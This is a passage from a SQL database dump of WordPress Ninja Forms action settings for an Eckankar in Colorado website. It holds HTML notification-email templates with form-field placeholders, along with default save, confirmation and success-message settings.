/>\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94}Â {field:lastname_95}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94}Â {field:lastname_95}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(3795,127,'drawerDisabled','','drawerDisabled',''),(3796,126,'drawerDisabled','','drawerDisabled',''),(3797,129,'title','','title',''),(3798,129,'key','','key',''),(3799,129,'type','save','type','save'),(3800,129,'active','1','active','1'),(3801,129,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(3802,129,'label','Store Submission','label','Store Submission'),(3803,129,'objectType','Action','objectType','Action'),(3804,129,'objectDomain','actions','objectDomain','actions'),(3805,129,'editActive','','editActive',''),(3806,129,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3807,129,'payment_gateways','','payment_gateways',''),(3808,129,'payment_total','','payment_total',''),(3809,129,'tag','','tag',''),(3810,129,'to','','to',''),(3811,129,'email_subject','','email_subject',''),(3812,129,'email_message','','email_message',''),(3813,129,'from_name','','from_name',''),(3814,129,'from_address','','from_address',''),(3815,129,'reply_to','','reply_to',''),(3816,129,'email_format','html','email_format','html'),(3817,129,'cc','','cc',''),(3818,129,'bcc','','bcc',''),(3819,129,'attach_csv','','attach_csv',''),(3820,129,'redirect_url','','redirect_url',''),(3821,129,'email_message_plain','','email_message_plain',''),(3822,129,'parent_id','33','parent_id','33'),(3823,130,'title','','title',''),(3824,130,'key','','key',''),(3825,130,'type','email','type','email'),(3826,130,'active','1','active','1'),(3827,130,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(3828,130,'label','Email Confirmation','label','Email Confirmation'),(3829,130,'to','{field:email}','to','{field:email}'),(3830,130,'subject','This is an email action.','subject','This is an email action.'),(3831,130,'message','Hello, Ninja Forms!','message','Hello, Ninja Forms!'),(3832,130,'objectType','Action','objectType','Action'),(3833,130,'objectDomain','actions','objectDomain','actions'),(3834,130,'editActive','','editActive',''),(3835,130,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3836,130,'payment_gateways','','payment_gateways',''),(3837,130,'payment_total','','payment_total',''),(3838,130,'tag','','tag',''),(3839,130,'email_subject','Submission Confirmation ','email_subject','Submission Confirmation '),(3840,130,'email_message','<p>{all_fields_table}<br></p>','email_message','<p>{all_fields_table}<br></p>'),(3841,130,'from_name','','from_name',''),(3842,130,'from_address','','from_address',''),(3843,130,'reply_to','','reply_to',''),(3844,130,'email_format','html','email_format','html'),(3845,130,'cc','','cc',''),(3846,130,'bcc','','bcc',''),(3847,130,'attach_csv','','attach_csv',''),(3848,130,'email_message_plain','','email_message_plain',''),(3849,130,'parent_id','33','parent_id','33'),(3850,131,'title','','title',''),(3851,131,'key','','key',''),(3852,131,'type','email','type','email'),(3853,131,'active','1','active','1'),(3854,131,'created_at','2016-08-24 16:47:39','created_at','2016-08-24 16:47:39'),(3855,131,'objectType','Action','objectType','Action'),(3856,131,'objectDomain','actions','objectDomain','actions'),(3857,131,'editActive','','editActive',''),(3858,131,'label','Email Notification','label','Email Notification'),(3859,131,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3860,131,'payment_gateways','','payment_gateways',''),(3861,131,'payment_total','','payment_total',''),(3862,131,'tag','','tag',''),(3863,131,'to','{system:admin_email}','to','{system:admin_email}'),(3864,131,'email_subject','New message from {field:name}','email_subject','New message from {field:name}'),(3865,131,'email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>','email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>'),(3866,131,'from_name','','from_name',''),(3867,131,'from_address','','from_address',''),(3868,131,'reply_to','{field:email}','reply_to','{field:email}'),(3869,131,'email_format','html','email_format','html'),(3870,131,'cc','','cc',''),(3871,131,'bcc','','bcc',''),(3872,131,'attach_csv','0','attach_csv','0'),(3873,131,'email_message_plain','','email_message_plain',''),(3874,131,'parent_id','33','parent_id','33'),(3875,132,'title','','title',''),(3876,132,'key','','key',''),(3877,132,'type','successmessage','type','successmessage'),(3878,132,'active','1','active','1'),(3879,132,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(3880,132,'label','Success Message','label','Success Message'),(3881,132,'message','Thank you {field:name} for filling out my form!','message','Thank you {field:name} for filling out my form!'),(3882,132,'objectType','Action','objectType','Action'),(3883,132,'objectDomain','actions','objectDomain','actions'),(3884,132,'editActive','','editActive',''),(3885,132,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3886,132,'payment_gateways','','payment_gateways',''),(3887,132,'payment_total','','payment_total',''),(3888,132,'tag','','tag',''),(3889,132,'to','','to',''),(3890,132,'email_subject','','email_subject',''),(3891,132,'email_message','','email_message',''),(3892,132,'from_name','','from_name',''),(3893,132,'from_address','','from_address',''),(3894,132,'reply_to','','reply_to',''),(3895,132,'email_format','html','email_format','html'),(3896,132,'cc','','cc',''),(3897,132,'bcc','','bcc',''),(3898,132,'attach_csv','','attach_csv',''),(3899,132,'redirect_url','','redirect_url',''),(3900,132,'success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>','success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>'),(3901,132,'email_message_plain','','email_message_plain',''),(3902,132,'parent_id','33','parent_id','33'),(3903,133,'objectType','Action','objectType','Action'),(3904,133,'objectDomain','actions','objectDomain','actions'),(3905,133,'editActive','','editActive',''),(3906,133,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3907,133,'payment_gateways','','payment_gateways',''),(3908,133,'payment_total','0','payment_total','0'),(3909,133,'tag','','tag',''),(3910,133,'to','{wp:admin_email}','to','{wp:admin_email}'),(3911,133,'reply_to','','reply_to',''),(3912,133,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3913,133,'email_message','{fields_table}','email_message','{fields_table}'),(3914,133,'email_message_plain','','email_message_plain',''),(3915,133,'from_name','','from_name',''),(3916,133,'from_address','','from_address',''),(3917,133,'email_format','html','email_format','html'),(3918,133,'cc','','cc',''),(3919,133,'bcc','','bcc',''),(3920,133,'redirect_url','','redirect_url',''),(3921,133,'submitter_email','','submitter_email',''),(3922,133,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3923,133,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3924,133,'set_subs_to_expire','0','set_subs_to_expire','0'),(3925,133,'subs_expire_time','90','subs_expire_time','90'),(3926,133,'title','','title',''),(3927,133,'key','','key',''),(3928,133,'type','save','type','save'),(3929,133,'active','1','active','1'),(3930,133,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(3931,133,'label','Save Form','label','Save Form'),(3932,133,'parent_id','13','parent_id','13'),(3933,134,'objectType','Action','objectType','Action'),(3934,134,'objectDomain','actions','objectDomain','actions'),(3935,134,'editActive','','editActive',''),(3936,134,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3937,134,'payment_gateways','','payment_gateways',''),(3938,134,'payment_total','0','payment_total','0'),(3939,134,'tag','','tag',''),(3940,134,'email_message_plain','','email_message_plain',''),(3941,134,'title','','title',''),(3942,134,'key','','key',''),(3943,134,'type','email','type','email'),(3944,134,'active','0','active','0'),(3945,134,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(3946,134,'date_updated','2016-01-15','date_updated','2016-01-15'),(3947,134,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(3948,134,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(3949,134,'to','{field:email_270}','to','{field:email_270}'),(3950,134,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(3951,134,'email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n','email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n'),(3952,134,'attach_csv','0','attach_csv','0'),(3953,134,'email_format','html','email_format','html'),(3954,134,'reply_to','','reply_to',''),(3955,134,'cc','','cc',''),(3956,134,'bcc','','bcc',''),(3957,134,'redirect_url','','redirect_url',''),(3958,134,'success_msg','','success_msg',''),(3959,134,'label','Send copy to user','label','Send copy to user'),(3960,134,'parent_id','13','parent_id','13'),(3961,135,'objectType','Action','objectType','Action'),(3962,135,'objectDomain','actions','objectDomain','actions'),(3963,135,'editActive','','editActive',''),(3964,135,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3965,135,'payment_gateways','','payment_gateways',''),(3966,135,'payment_total','0','payment_total','0'),(3967,135,'tag','','tag',''),(3968,135,'email_message_plain','','email_message_plain',''),(3969,135,'submitter_email','','submitter_email',''),(3970,135,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3971,135,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3972,135,'set_subs_to_expire','0','set_subs_to_expire','0'),(3973,135,'subs_expire_time','90','subs_expire_time','90'),(3974,135,'title','','title',''),(3975,135,'key','','key',''),(3976,135,'type','successmessage','type','successmessage'),(3977,135,'active','1','active','1'),(3978,135,'created_at','2018-01-03 